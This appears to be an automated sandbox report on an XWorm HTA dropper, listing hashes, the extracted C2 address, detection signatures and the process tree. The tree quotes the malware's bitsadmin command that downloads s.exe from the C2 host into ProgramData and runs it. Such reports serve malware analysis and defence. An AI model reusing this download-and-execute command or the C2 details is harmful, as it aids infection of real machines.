Analysis
max time kernel: 119s
max time network: 123s
platform: windows7_x64
resource: win7-20240319-en
resource tags: arch:x64, arch:x86, image:win7-20240319-en, locale:en-us, os:windows7-x64, system
submitted: 02/04/2024, 18:09
Static task: static1
Behavioral task: behavioral1
Sample: e81963d4c5a431f529c7669d3595a943.hta
Resource: win7-20240319-en
9 signatures
150 seconds
General
Target: e81963d4c5a431f529c7669d3595a943.hta
Size: 834B
MD5: e81963d4c5a431f529c7669d3595a943
SHA1: 82ac49f24caad73263ae461a2c1c7546b1ba9ded
SHA256: cf6cab6b405f7e849e6585f6f4c1ae3fd155b75d8ceb197bd0cf46a9b4c5f91b
SHA512: 2ba83def4a81ede89bd54a5c0d4b4592985c13a10507b9a2dfb45c46e6e234d54dc14f98562eb2d3d3766e28290e83175c098a6203dd52effacc0176da7bb209
Malware Config
Extracted
Family: xworm
C2: 210.246.215.82:7000
Attributes
- Install_directory: %ProgramData%
- install_file: WindowsNT.exe
Signatures
- Detect Xworm Payload (2 IoCs)
  resource | yara_rule
  behavioral1/memory/2828-0-0x0000000001140000-0x000000000119A000-memory.dmp | family_xworm
  behavioral1/memory/2828-2-0x000000001B430000-0x000000001B4B0000-memory.dmp | family_xworm
- Downloads MZ/PE file
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  5 | ip-api.com
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Download via BitsAdmin (1 TTPs, 1 IoCs)
  pid | Process
  1164 | bitsadmin.exe
- Modifies Internet Explorer settings
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 2828 | s.exe
- Suspicious use of WriteProcessMemory (8 IoCs)
  description | pid | Process | procid_target
  PID 2000 wrote to memory of 1164 | 2000 | mshta.exe | 28
  PID 2000 wrote to memory of 1164 | 2000 | mshta.exe | 28
  PID 2000 wrote to memory of 1164 | 2000 | mshta.exe | 28
  PID 2000 wrote to memory of 1164 | 2000 | mshta.exe | 28
  PID 2000 wrote to memory of 2828 | 2000 | mshta.exe | 30
  PID 2000 wrote to memory of 2828 | 2000 | mshta.exe | 30
  PID 2000 wrote to memory of 2828 | 2000 | mshta.exe | 30
  PID 2000 wrote to memory of 2828 | 2000 | mshta.exe | 30
Processes
- C:\Windows\SysWOW64\mshta.exe
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\e81963d4c5a431f529c7669d3595a943.hta"
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID: 2000
  - C:\Windows\SysWOW64\bitsadmin.exe
    Command line: "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://210.246.215.82/s.exe C:\ProgramData\s.exe
    - Download via BitsAdmin
    PID: 1164
  - C:\ProgramData\s.exe
    Command line: "C:\ProgramData\s.exe"
    - Suspicious use of AdjustPrivilegeToken
    PID: 2828